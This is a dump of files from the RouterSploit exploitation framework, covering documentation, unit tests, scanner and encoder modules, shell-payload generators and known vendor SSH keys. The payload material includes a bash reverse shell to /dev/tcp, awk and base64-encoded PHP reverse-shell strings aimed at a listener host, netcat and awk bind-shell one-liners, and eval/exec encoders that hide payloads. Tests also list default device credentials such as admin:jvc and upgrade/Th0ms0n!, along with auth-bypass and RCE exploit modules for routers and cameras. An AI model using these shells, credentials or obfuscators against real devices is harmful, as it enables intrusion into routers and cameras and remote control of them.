``` 26 | -------------------------------------------------------------------------------- /docs/modules/encoders/perl/base64.md: -------------------------------------------------------------------------------- 1 | ## Description 2 | 3 | Module encodes Perl payload to base64 format. 4 | 5 | ## Verification Steps 6 | 7 | 1. Start `./rsf.py` 8 | 2. Do: `use encoders/perl/base64` 9 | 3. Do: `show info` 10 | 11 | ## Scenarios 12 | 13 | ``` 14 | rsf > use encoders/perl/base64 15 | rsf (Perl Base64 Encoder) > show info 16 | 17 | Name: 18 | Perl Base64 Encoder 19 | 20 | Description: 21 | Module encodes PERL payload to Base64 format. 22 | 23 | Authors: 24 | - Marcin Bury 25 | ``` 26 | -------------------------------------------------------------------------------- /routersploit/modules/scanners/cameras/camera_scan.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.scanners.autopwn import Exploit 2 | 3 | 4 | class Exploit(Exploit): 5 | __info__ = { 6 | "name": "Camera Scanner", 7 | "description": "Module that scans for cameras vulnerablities and weaknesses.", 8 | "authors": ( 9 | "Marcin Bury ", # routersploit module 10 | ), 11 | "devices": ( 12 | "Cameras", 13 | ), 14 | } 15 | 16 | modules = ["generic", "cameras"] 17 | -------------------------------------------------------------------------------- /routersploit/modules/scanners/misc/misc_scan.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.scanners.autopwn import Exploit 2 | 3 | 4 | class Exploit(Exploit): 5 | __info__ = { 6 | "name": "Misc Scanner", 7 | "description": "Module that scans for misc devices vulnerablities and weaknesses.", 8 | "authors": ( 9 | "Marcin Bury ", # routersploit module 10 | ), 11 | "devices": ( 12 | "Misc Device", 13 | ), 14 | } 15 | 16 | modules = ["generic", "misc"] 17 | -------------------------------------------------------------------------------- /routersploit/modules/scanners/routers/router_scan.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.scanners.autopwn import Exploit 2 | 3 | 4 | class Exploit(Exploit): 5 | __info__ = { 6 | "name": "Router Scanner", 7 | "description": "Module that scans for routers vulnerablities and weaknesses.", 8 | "authors": ( 9 | "Marcin Bury ", # routersploit module 10 | ), 11 | "devices": ( 12 | "Router", 13 | ), 14 | } 15 | 16 | modules = ["generic", "routers"] 17 | -------------------------------------------------------------------------------- /tests/creds/generic/test_snmp_bruteforce.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.generic.snmp_bruteforce import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenerio - testing against SNMP server """ 6 | 7 | exploit = Exploit() 8 | 9 | assert exploit.target == "" 10 | assert exploit.port == 161 11 | assert exploit.version == 1 12 | assert exploit.threads == 8 13 | assert type(exploit.defaults) is list 14 | assert exploit.stop_on_success is True 15 | assert exploit.verbosity is True 16 | -------------------------------------------------------------------------------- /docs/modules/encoders/python/base64.md: -------------------------------------------------------------------------------- 1 | ## Description 2 | 3 | Module encodes Python payload to base64 format. 4 | 5 | ## Verification Steps 6 | 7 | 1. Start `./rsf.py` 8 | 2. Do: `use encoders/python/base64` 9 | 3. Do: `show info` 10 | 11 | ## Scenarios 12 | 13 | ``` 14 | rsf > use encoders/python/base64 15 | rsf (Python Base64 Encoder) > show info 16 | 17 | Name: 18 | Python Base64 Encoder 19 | 20 | Description: 21 | Module encodes Python payload to Base64 format. 22 | 23 | Authors: 24 | - Marcin Bury 25 | ``` 26 | -------------------------------------------------------------------------------- /tests/creds/generic/test_http_basic_digest_default.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.generic.http_basic_digest_default import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenerio - testing against HTTP server """ 6 | 7 | exploit = Exploit() 8 | 9 | assert exploit.target == "" 10 | assert exploit.port == 80 11 | assert exploit.threads == 8 12 | assert type(exploit.defaults) is list 13 | assert exploit.path == "/" 14 | assert exploit.stop_on_success is True 15 | assert exploit.verbosity is True 16 | -------------------------------------------------------------------------------- /tests/payloads/cmd/test_awk_reverse_tcp.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.payloads.cmd.awk_reverse_tcp import Payload 2 | 3 | 4 | # awk reverse tcp payload with lhost=192.168.1.4 lport=4321 5 | reverse_tcp = ( 6 | "awk 'BEGIN{s=\"/inet/tcp/0/192.168.1.4/4321\";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)};'" 7 | ) 8 | 9 | 10 | def test_payload_generation(): 11 | """ Test scenario - payload generation """ 12 | 13 | payload = Payload() 14 | payload.lhost = "192.168.1.4" 15 | payload.lport = 4321 16 | 17 | assert payload.run() == reverse_tcp 18 | -------------------------------------------------------------------------------- /tests/exploits/routers/technicolor/test_tg784_authbypass.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.exploits.routers.technicolor.tg784_authbypass import Exploit 2 | 3 | 4 | def test_check_success(target): 5 | """ Test scenario - successful exploitation """ 6 | 7 | exploit = Exploit() 8 | 9 | assert exploit.target == "" 10 | assert exploit.port == 21 11 | assert exploit.username == "upgrade" 12 | assert exploit.password == "Th0ms0n!" 13 | 14 | exploit.target = target.host 15 | exploit.port = target.port 16 | 17 | assert exploit.check() is False 18 | assert exploit.run() is None 19 | -------------------------------------------------------------------------------- /tests/creds/generic/test_http_basic_digest_bruteforce.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.generic.http_basic_digest_bruteforce import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenerio - testing against HTTP server """ 6 | 7 | exploit = Exploit() 8 | 9 | assert exploit.target == "" 10 | assert exploit.port == 80 11 | assert exploit.threads == 8 12 | assert type(exploit.usernames) is list 13 | assert type(exploit.passwords) is list 14 | assert exploit.path == "/" 15 | assert exploit.stop_on_success is True 16 | assert exploit.verbosity is True 17 | -------------------------------------------------------------------------------- /.travis/install.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | set -e 4 | set -x 5 | 6 | if [[ "$(uname -s)" == 'Darwin' ]]; then 7 | sw_vers 8 | 9 | git clone --depth 1 https://github.com/yyuu/pyenv.git ~/.pyenv 10 | PYENV_ROOT="$HOME/.pyenv" 11 | PATH="$PYENV_ROOT/bin:$PATH" 12 | eval "$(pyenv init -)" 13 | 14 | pyenv install $PYTHON_VERSION 15 | pyenv global $PYTHON_VERSION 16 | pyenv rehash 17 | 18 | pip install --user virtualenv 19 | python -m virtualenv ~/.venv 20 | source ~/.venv/bin/activate 21 | fi 22 | 23 | python -m pip install --upgrade pip 24 | python -m pip install -r requirements-dev.txt 25 | -------------------------------------------------------------------------------- /tests/exploits/routers/dlink/test_dir_815_850l_rce.py: -------------------------------------------------------------------------------- 1 | from unittest import mock 2 | from routersploit.modules.exploits.routers.dlink.dir_815_850l_rce import Exploit 3 | 4 | 5 | @mock.patch("routersploit.modules.exploits.routers.dlink.dir_815_850l_rce.shell") 6 | def test_check_success(mocked_shell, udp_target): 7 | """ Test scenario - successful check """ 8 | 9 | exploit = Exploit() 10 | 11 | assert exploit.target == "" 12 | assert exploit.port == 1900 13 | 14 | exploit.target = udp_target.host 15 | exploit.port = udp_target.port 16 | 17 | assert exploit.check() is None 18 | assert exploit.run() is None 19 | -------------------------------------------------------------------------------- /docs/modules/payloads/cmd/netcat_bind_tcp.md: -------------------------------------------------------------------------------- 1 | ## Description 2 | 3 | Module generates payload that creates interactive tcp bind shell by using netcat one-liner. 4 | 5 | ## Verification Steps 6 | 7 | 1. Start `./rsf.py` 8 | 2. Do: `use payloads/cmd/netcat_bind_tcp` 9 | 3. Do: `set rport 4321` 10 | 4. Do: `run` 11 | 5. Module generates netcat tcp bind shell payload. 12 | 13 | ## Scenarios 14 | 15 | ``` 16 | rsf > use payloads/cmd/netcat_bind_tcp 17 | rsf (Netcat Bind TCP) > set rport 4321 18 | [+] rport => 4321 19 | rsf (Netcat Bind TCP) > run 20 | [*] Running module... 21 | [*] Generating payload 22 | nc -lvp 4321 -e /bin/sh 23 | ``` 24 | -------------------------------------------------------------------------------- /tests/payloads/cmd/test_php_reverse_tcp.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.payloads.cmd.php_reverse_tcp import Payload 2 | 3 | 4 | # php reverse udp payload with lhost=192.168.1.4 lport=4321 5 | reverse_tcp = ( 6 | "php -r \"eval(base64_decode('JHM9ZnNvY2tvcGVuKCJ0Y3A6Ly8xOTIuMTY4LjEuNCIsNDMyMSk7d2hpbGUoIWZlb2YoJHMpKXtleGVjKGZnZXRzKCRzKSwkbyk7JG89aW1wbG9kZSgiXG4iLCRvKTskby49IlxuIjtmcHV0cygkcywkbyk7fQ=='));\"" 7 | ) 8 | 9 | 10 | def test_payload_generation(): 11 | """ Test scenario - payload generation """ 12 | 13 | payload = Payload() 14 | payload.lhost = "192.168.1.4" 15 | payload.lport = 4321 16 | 17 | assert payload.run() == reverse_tcp 18 | -------------------------------------------------------------------------------- /tests/exploits/routers/cisco/test_ucm_info_disclosure.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.exploits.routers.cisco.ucm_info_disclosure import Exploit 2 | 3 | 4 | def test_check_success(udp_target): 5 | """ Test scenario - successful check """ 6 | 7 | command_mock = udp_target.get_command_mock(b"\x00\x01SPDefault.cnf.xml\x00netascii\x00") 8 | command_mock.return_value = b"TEST UseUserCredential Test" 9 | 10 | exploit = Exploit() 11 | 12 | assert exploit.target == "" 13 | assert exploit.port == 69 14 | 15 | exploit.target = udp_target.host 16 | exploit.port = udp_target.port 17 | 18 | assert exploit.check() 19 | assert exploit.run() is None 20 | -------------------------------------------------------------------------------- /tests/exploits/routers/belkin/test_auth_bypass.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.exploits.routers.belkin.auth_bypass import Exploit 2 | 3 | 4 | def test_check_success(target): 5 | """ Test scenario - successful check """ 6 | 7 | route_mock = target.get_route_mock("/login.stm", methods=["GET"]) 8 | route_mock.return_value = ( 9 | "test" 10 | "password= \"admin1234\"" 11 | "test" 12 | ) 13 | exploit = Exploit() 14 | 15 | assert exploit.target == "" 16 | assert exploit.port == 80 17 | 18 | exploit.target = target.host 19 | exploit.port = target.port 20 | 21 | assert exploit.check() 22 | assert exploit.run() is None 23 | -------------------------------------------------------------------------------- /tests/exploits/routers/linksys/test_eseries_themoon_rce.py: -------------------------------------------------------------------------------- 1 | from unittest import mock 2 | from routersploit.modules.exploits.routers.linksys.eseries_themoon_rce import Exploit 3 | 4 | 5 | @mock.patch("routersploit.modules.exploits.routers.linksys.eseries_themoon_rce.shell") 6 | def test_check_success(mocked_shell, target): 7 | """ Test scenario - successful check """ 8 | 9 | route_mock = target.get_route_mock("/tmUnblock.cgi", methods=["GET", "POST"]) 10 | route_mock.return_value = "" 11 | 12 | exploit = Exploit() 13 | exploit.target = target.host 14 | exploit.port = target.port 15 | 16 | assert exploit.check() 17 | assert exploit.run() is None 18 | -------------------------------------------------------------------------------- /routersploit/modules/encoders/perl/hex.py: -------------------------------------------------------------------------------- 1 | from routersploit.core.exploit.encoders import BaseEncoder 2 | from routersploit.core.exploit.payloads import Architectures 3 | 4 | 5 | class Encoder(BaseEncoder): 6 | __info__ = { 7 | "name": "Perl Hex Encoder", 8 | "description": "Module encodes PERL payload to Hex format.", 9 | "authors": ( 10 | "Marcin Bury ", # routersploit module 11 | ), 12 | } 13 | 14 | architecture = Architectures.PERL 15 | 16 | def encode(self, payload): 17 | encoded_payload = bytes(payload, "utf-8").hex() 18 | return "eval(pack('H*','{}'));".format(encoded_payload) 19 | -------------------------------------------------------------------------------- /routersploit/resources/ssh_keys/quantum-dxi-v1000.json: -------------------------------------------------------------------------------- 1 | { 2 | "username": "root", 3 | "pub_key": "ssh-dss AAAAB3NzaC1kc3MAAACBAISAE3CAX4hsxTw0dRc0gx8nQ41r3Vkj9OmG6LGeKWRmpy7C6vaExuupjxid76fd4aS56lCUEEoRlJ3zE93qoK9acI6EGqGQFLuDZ0fqMyRSX+ilf+1HDo/TRyuraggxp9Hj9LMpZVbpFATMm0+d9Xs7eLmaJjuMsowNlOf8NFdHAAAAFQCwdvqOAkR6QhuiAapQ/9iVuR0UAQAAAIBpLMo4dhSeWkChfv659WLPftxRrX/HR8YMD/jqa3R4PsVM2g6dQ1191nHugtdV7uaMeOqOJ/QRWeYM+UYwT0Zgx2LqvgVSjNDfdjk+ZRY8x3SmExFi62mKFoTGSOCXfcAfuanjaoF+sepnaiLUd+SoJShGYHoqR2QWiysTRqknlwAAAIBLEgYmr9XCSqjENFDVQPFELYKT7Zs9J87PjPS1AP0qF1OoRGZ5mefK6X/6VivPAUWmmmev/BuAs8M1HtfGeGGzMzDIiU/WZQ3bScLB1Ykrcjk7TOFD6xrnk/inYAp5l29hjidoAONcXoHmUAMYOKqn63Q2AsDpExVcmfj99/BlpQ==" 4 | } 5 | -------------------------------------------------------------------------------- /docs/modules/payloads/cmd/awk_bind_udp.md: -------------------------------------------------------------------------------- 1 | ## Description 2 | 3 | Module generates payload that creates interactive udp bind shell by using awk. 4 | 5 | ## Verification Steps 6 | 7 | 1. Start `./rsf.py` 8 | 2. Do: `use payloads/cmd/awk_bind_tcp` 9 | 3. Do: `set rport 4321` 10 | 4. Do: `run` 11 | 5. Module generates awk udp bind shell payload 12 | 13 | ## Scenarios 14 | 15 | ``` 16 | rsf > use payloads/cmd/awk_bind_udp 17 | rsf (Awk Bind UDP) > set rport 4321 18 | [+] rport => 4321 19 | rsf (Awk Bind UDP) > run 20 | [*] Running module... 21 | [*] Generating payload 22 | awk 'BEGIN{s="/inet/udp/4321/0/0";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}' 23 | ``` 24 | -------------------------------------------------------------------------------- /routersploit/resources/ssh_keys/array-networks-vapv-vxag.json: -------------------------------------------------------------------------------- 1 | { 2 | "username": "sync", 3 | "pub_key": "ssh-dss AAAAB3NzaC1kc3MAAACBAJTDsX+8olPZeyr58g9XE0L8PKT5030NZBPlE7np4hBqx36HoWarWq1Csn8M57dWN9StKbs03k2ggY6sYJK5AW2EWar70um3pYjKQHiZq7mITmitsozFN/K7wu2e2iKRgquUwH5SuYoOJ29n7uhaILXiKZP4/H/dDudqPRSY6tJPAAAAFQDtuWH90mDbU2L/Ms2lfl/cja/wHwAAAIAMBwSHZt2ysOHCFe1WLUvdwVDHUqk3QHTskuuAnMlwMtSvCaUxSatdHahsMZ9VCHjoQUx6j+TcgRLDbMlRLnwUlb6wpniehLBFk+qakGcREqks5NxYzFTJXwROzP72jPvVgQyOZHWq81gCild/ljL7hmrduCqYwxDIz4o7U92UKQAAAIBmhSl9CVPgVMv1xO8DAHVhM1huIIK8mNFrzMJz+JXzBx81ms1kWSeQOC/nraaXFTBlqiQsvB8tzr4xZdbaI/QzVLKNAF5C8BJ4ScNlTIx1aZJwyMil8Nzb+0YAsw5Ja+bEZZvEVlAYnd10qRWrPeEY1txLMmX3wDa+JvJL7fmuBg==" 4 | } 5 | -------------------------------------------------------------------------------- /tests/exploits/routers/cisco/test_dpc2420_info_disclosure.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.exploits.routers.cisco.dpc2420_info_disclosure import Exploit 2 | 3 | 4 | def test_check_success(target): 5 | """ Test scenario - successful check """ 6 | 7 | route_mock = target.get_route_mock("/filename.gwc", methods=["GET"]) 8 | route_mock.return_value = ( 9 | "User Password" 10 | "Admin1234" 11 | ) 12 | 13 | exploit = Exploit() 14 | 15 | assert exploit.target == "" 16 | assert exploit.port == 8080 17 | 18 | exploit.target = target.host 19 | exploit.port = target.port 20 | 21 | assert exploit.check() 22 | assert exploit.run() is None 23 | -------------------------------------------------------------------------------- /routersploit/modules/encoders/python/hex.py: -------------------------------------------------------------------------------- 1 | from routersploit.core.exploit.encoders import BaseEncoder 2 | from routersploit.core.exploit.payloads import Architectures 3 | 4 | 5 | class Encoder(BaseEncoder): 6 | __info__ = { 7 | "name": "Python Hex Encoder", 8 | "description": "Module encodes Python payload to Hex format.", 9 | "authors": ( 10 | "Marcin Bury ", # routersploit module 11 | ), 12 | } 13 | 14 | architecture = Architectures.PYTHON 15 | 16 | def encode(self, payload): 17 | encoded_payload = bytes(payload, "utf-8").hex() 18 | return "exec('{}'.decode('hex'))".format(encoded_payload) 19 | -------------------------------------------------------------------------------- /routersploit/resources/ssh_keys/barracuda_load_balancer_vm.json: -------------------------------------------------------------------------------- 1 | { 2 | "username": "cluster", 3 | "pub_key": "ssh-dss AAAAB3NzaC1kc3MAAACBAMq5EcIFdfCjJakyQnP/BBp9oc6mpaZVguf0Znp5C40twiG1lASQJZlM1qOB/hkBWYeBCHUkcOLEnVXSZzB62L+W/LGKodqnsiQPRr57AA6jPc6mNBnejHai8cSdAl9n/0s2IQjdcrxM8CPq2uEyfm0J3AV6Lrbbxr5NgE5xxM+DAAAAFQCmFk/M7Rx2jexsJ9COpHkHwUjcNQAAAIAdg18oByp/tjjDKhWhmmv+HbVIROkRqSxBvuEZEmcWlg38mLIT1bydfpSou/V4rI5ctxwCfJ1rRr66pw6GwCrz4fXmyVlhrj7TrktyQ9+zRXhynF4wdNPWErhNHb8tGlSOFiOBcUTlouX3V/ka6Dkd6ZQrZLQFaH+gjfyTZZ82HQAAAIEArsJgp7RLPOsCeLqoia/eljseBFVDazO5Q0ysUotTw9wgXGGVWREwm8wNggFNb9eCiBAAUfVZVfhVAtFT0pBf/eIVLPXyaMw3prBt7LqeBrbagODc3WAAdMTPIdYYcOKgv+YvTXa51zG64v6pQOfS8WXgKCzDl44puXfYeDk5lVQ=" 4 | } 5 | -------------------------------------------------------------------------------- /tests/exploits/routers/cisco/test_secure_acs_bypass.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.exploits.routers.cisco.secure_acs_bypass import Exploit 2 | 3 | 4 | def test_check_success(target): 5 | """ Test scenario - successful check """ 6 | 7 | exploit = Exploit() 8 | 9 | assert exploit.target == "" 10 | assert exploit.port == 443 11 | assert exploit.ssl is True 12 | assert exploit.path == "/PI/services/UCP/" 13 | assert exploit.username == "" 14 | assert exploit.password == "" 15 | 16 | exploit.target = target.host 17 | exploit.port = target.port 18 | exploit.ssl = "false" 19 | 20 | assert exploit.check() is None 21 | assert exploit.run() is None 22 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE.md: -------------------------------------------------------------------------------- 1 | ! ANY INCOMPLETE REPORT WILL BE CLOSED RIGHT AWAY ! 2 | 3 | ## Steps to Reproduce (for bugs) 4 | 1. 5 | 2. 6 | 3. 7 | 4. 8 | 9 | ## Your Environment 10 | * RouterSploit Version used: 11 | * Operating System and version: 12 | * Python Version: ( `python3 --version` ) 13 | * Python Environment: ( `python3 -m pip freeze` ) 14 | 15 | ## Current Behavior 16 | * If describing a bug, tell us what happens instead of the expected behavior 17 | * If suggesting a change/improvement, tell us how it works right now 18 | 19 | ## Expected Behavior 20 | * If you're describing a bug, tell us what should happen 21 | * If you're suggesting a change/improvement, tell us how it should work 22 | -------------------------------------------------------------------------------- /docs/modules/payloads/cmd/awk_bind_tcp.md: -------------------------------------------------------------------------------- 1 | ## Description 2 | 3 | Module generates payload that creates interactive tcp bind shell by using awk one-liner. 4 | 5 | ## Verification Steps 6 | 7 | 1. Start `./rsf.py` 8 | 2. Do: `use payloads/cmd/awk_bind_tcp` 9 | 3. Do: `set rport 4321` 10 | 4. Do: `run` 11 | 5. Module generates awk tcp bind shell payload. 12 | 13 | ## Scenarios 14 | 15 | ``` 16 | rsf > use payloads/cmd/awk_bind_tcp 17 | rsf (Awk Bind TCP) > set rport 4321 18 | [+] rport => 4321 19 | rsf (Awk Bind TCP) > run 20 | [*] Running module... 21 | [*] Generating payload 22 | awk 'BEGIN{s="/inet/tcp/4321/0/0";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}' 23 | ``` 24 | -------------------------------------------------------------------------------- /routersploit/modules/payloads/cmd/bash_reverse_tcp.py: -------------------------------------------------------------------------------- 1 | from routersploit.core.exploit import * 2 | from routersploit.core.exploit.payloads import GenericPayload, ReverseTCPPayloadMixin 3 | 4 | 5 | class Payload(ReverseTCPPayloadMixin, GenericPayload): 6 | __info__ = { 7 | "name": "Bash Reverse TCP", 8 | "description": "Creates interactive tcp reverse shell by using bash.", 9 | "authors": ( 10 | "Marcin Bury ", # routersploit module 11 | ), 12 | } 13 | 14 | cmd = OptString("bash", "Bash binary") 15 | 16 | def generate(self): 17 | return "{} -i >& /dev/tcp/{}/{} 0>&1".format(self.cmd, self.lhost, self.lport) 18 | -------------------------------------------------------------------------------- /tests/exploits/cameras/siemens/test_cvms2025_credentials_disclosure.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.exploits.cameras.siemens.cvms2025_credentials_disclosure import Exploit 2 | 3 | 4 | def test_check_success(target): 5 | """ Test scenario - successful exploitation """ 6 | 7 | route_mock = target.get_route_mock("/cgi-bin/readfile.cgi", methods=["GET"]) 8 | route_mock.return_value = ( 9 | 'Adm_ID="admin"' 10 | ) 11 | 12 | exploit = Exploit() 13 | 14 | assert exploit.target == "" 15 | assert exploit.port == 80 16 | 17 | exploit.target = target.host 18 | exploit.port = target.port 19 | 20 | assert exploit.check() 21 | assert exploit.run() is None 22 | -------------------------------------------------------------------------------- /tests/exploits/routers/linksys/test_smartwifi_password_disclosure.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.exploits.routers.linksys.smartwifi_password_disclosure import Exploit 2 | 3 | 4 | def test_check_success(target): 5 | """ Test scenario - successful check """ 6 | 7 | route_mock = target.get_route_mock("/.htpasswd", methods=["GET"]) 8 | route_mock.return_value = ( 9 | 'admin:$1$3Eb757jl$zFM3Mtk8Qmkp3kjbRukUq/' 10 | ) 11 | 12 | exploit = Exploit() 13 | 14 | assert exploit.target == "" 15 | assert exploit.port == 80 16 | 17 | exploit.target = target.host 18 | exploit.port = target.port 19 | 20 | assert exploit.check() 21 | assert exploit.run() is None 22 | -------------------------------------------------------------------------------- /routersploit/modules/payloads/cmd/php_bind_tcp.py: -------------------------------------------------------------------------------- 1 | from routersploit.core.exploit import * 2 | from routersploit.modules.payloads.php.bind_tcp import Payload as PHPBindTCP 3 | 4 | 5 | class Payload(PHPBindTCP): 6 | __info__ = { 7 | "name": "PHP Bind TCP One-Liner", 8 | "description": "Creates interactive tcp bind shell by using php one-liner.", 9 | "authors": ( 10 | "Marcin Bury ", # routersploit module 11 | ), 12 | } 13 | 14 | cmd = OptString("php", "PHP binary") 15 | 16 | def generate(self): 17 | self.fmt = self.cmd + ' -r "{}"' 18 | payload = super(Payload, self).generate() 19 | return payload 20 | -------------------------------------------------------------------------------- /routersploit/resources/ssh_keys/monroe-dasdec-cve-2013-0137.json: -------------------------------------------------------------------------------- 1 | { 2 | "username": "root", 3 | "pub_key": "ssh-dss AAAAB3NzaC1kc3MAAACBAN3AITryJMQyOKZjAky+mQ/8pOHIlu4q8pzmR0qotKaLm2yye5a0PY2rOaQRAzi7EPheBXbqTb8a8TrHhGXI5P7GUHaJho5HhEnw+5TwAvP72L7LcPwxMxj/rLcR/jV+uLMsVeJVWjwJcUv83yzPXoVjK0hrIm+RLLeuTM+gTylHAAAAFQD5gBdXsXAiTz1atzMg3xDFF1zlowAAAIAlLy6TCMlOBM0IcPsvP/9bEjDj0M8YZazdqt4amO2IaNUPYt9/sIsLOQfxIj8myDK1TOp8NyRJep7V5aICG4f3Q+XktlmLzdWn3sjvbWuIAXe1opjG2T69YhxfHZr8Wn7P4tpCgyqM4uHmUKrfnBzQQ9vkUUWsZoUXM2Z7vUXVfQAAAIAU6eNlphQWDwx0KOBiiYhF9BM6kDbQlyw8333rAG3G4CcjI2G8eYGtpBNliaD185UjCEsjPiudhGil/j4Zt/+VY3aGOLoi8kqXBBc8ZAML9bbkXpyhQhMgwiywx3ciFmvSn2UAin8yurStYPQxtXauZN5PYbdwCHPS7ApIStdpMA== wood@endec1" 4 | } 5 | -------------------------------------------------------------------------------- /routersploit/resources/ssh_keys/loadbalancer.org-enterprise-va.json: -------------------------------------------------------------------------------- 1 | { 2 | "username": "root", 3 | "pub_key": "ssh-dss AAAAB3NzaC1kc3MAAACBAKwKBw7D4OA1H/uD4htdh04TBIHdbSjeXUSnWJsce8C0tvoB01Yarjv9TFj+tfeDYVWtUK1DA1JkyqSuoAtDANJzF4I6Isyd0KPrW3dHFTcg6Xlz8d3KEaHokY93NOmB/xWEkhme8b7Q0U2iZie2pgWbTLXV0FA+lhskTtPHW3+VAAAAFQDRyayUlVZKXEweF3bUe03zt9e8VQAAAIAEPK1k3Y6ErAbIl96dnUCnZjuWQ7xXy062pf63QuRWI6LYSscm3f1pEknWUNFr/erQ02pkfi2eP9uHl1TI1ql+UmJX3g3frfssLNZwWXAW0m8PbY3HZSs+f5hevM3ua32pnKDmbQ2WpvKNyycKHi81hSI14xMcdblJolhN5iY8/wAAAIAjEe5+0m/TlBtVkqQbUit+s/g+eB+PFQ+raaQdL1uztW3etntXAPH1MjxsAC/vthWYSTYXORkDFMhrO5ssE2rfg9io0NDyTIZt+VRQMGdi++dH8ptU+ldl2ZejLFdTJFwFgcfXz+iQ1mx6h9TPX1crE1KoMAVOj3yKVfKpLB1EkA== root@lbslave" 4 | } 5 | -------------------------------------------------------------------------------- /tests/creds/cameras/jvc/test_ssh_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.jvc.ssh_default_creds import Exploit 2 | 3 | 4 | def test_check_success(target): 5 | """ Test scenario - testing against SSH server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 22 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["admin:jvc"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = target.host 16 | exploit.port = target.port 17 | 18 | assert exploit.check() is False 19 | assert exploit.check_default() is None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /routersploit/modules/payloads/cmd/perl_bind_tcp.py: -------------------------------------------------------------------------------- 1 | from routersploit.core.exploit import * 2 | from routersploit.modules.payloads.perl.bind_tcp import Payload as PerlBindTCP 3 | 4 | 5 | class Payload(PerlBindTCP): 6 | __info__ = { 7 | "name": "Perl Bind TCP One-Liner", 8 | "description": "Creates interactive tcp bind shell by using perl one-liner.", 9 | "authors": ( 10 | "Marcin Bury ", # routersploit module 11 | ), 12 | } 13 | 14 | cmd = OptString("perl", "Perl binary") 15 | 16 | def generate(self): 17 | self.fmt = self.cmd + " -MIO -e \"{}\"" 18 | payload = super(Payload, self).generate() 19 | return payload 20 | -------------------------------------------------------------------------------- /tests/creds/cameras/speco/test_ssh_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.speco.ssh_default_creds import Exploit 2 | 3 | 4 | def test_check_success(target): 5 | """ Test scenario - testing against SSH server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 22 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["admin:1234"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = target.host 16 | exploit.port = target.port 17 | 18 | assert exploit.check() is False 19 | assert exploit.check_default() is None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/exploits/routers/thomson/test_twg850_password_disclosure.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.exploits.routers.thomson.twg850_password_disclosure import Exploit 2 | 3 | 4 | def test_exploit_success(target): 5 | """ Test scenario - successful exploitation """ 6 | 7 | route_mock = target.get_route_mock("/GatewaySettings.bin", methods=["GET"]) 8 | route_mock.return_value = ( 9 | "TEST" 10 | "0MLog" 11 | "TEST" 12 | ) 13 | 14 | exploit = Exploit() 15 | 16 | assert exploit.target == "" 17 | assert exploit.port == 80 18 | 19 | exploit.target = target.host 20 | exploit.port = target.port 21 | 22 | assert exploit.check() 23 | assert exploit.run() is None 24 | -------------------------------------------------------------------------------- /routersploit/modules/payloads/cmd/php_reverse_tcp.py: -------------------------------------------------------------------------------- 1 | from routersploit.core.exploit import * 2 | from routersploit.modules.payloads.php.reverse_tcp import Payload as PHPReverseTCP 3 | 4 | 5 | class Payload(PHPReverseTCP): 6 | __info__ = { 7 | "name": "PHP Reverse TCP One-Liner", 8 | "description": "Creates interactive tcp reverse shell by using php one-liner.", 9 | "authors": ( 10 | "Marcin Bury ", # routersploit module 11 | ), 12 | } 13 | 14 | cmd = OptString("php", "PHP binary") 15 | 16 | def generate(self): 17 | self.fmt = self.cmd + ' -r "{}"' 18 | payload = super(Payload, self).generate() 19 | return payload 20 | -------------------------------------------------------------------------------- /tests/creds/cameras/arecont/test_ssh_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.arecont.ssh_default_creds import Exploit 2 | 3 | 4 | def test_check_success(target): 5 | """ Test scenario - testing against SSH server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 22 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["admin:", ":"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = target.host 16 | exploit.port = target.port 17 | 18 | assert exploit.check() is False 19 | assert exploit.check_default() is None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/creds/cameras/avtech/test_ssh_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.avtech.ssh_default_creds import Exploit 2 | 3 | 4 | def test_check_success(target): 5 | """ Test scenario - testing against SSH server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 22 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["admin:admin"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = target.host 16 | exploit.port = target.port 17 | 18 | assert exploit.check() is False 19 | assert exploit.check_default() is None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- 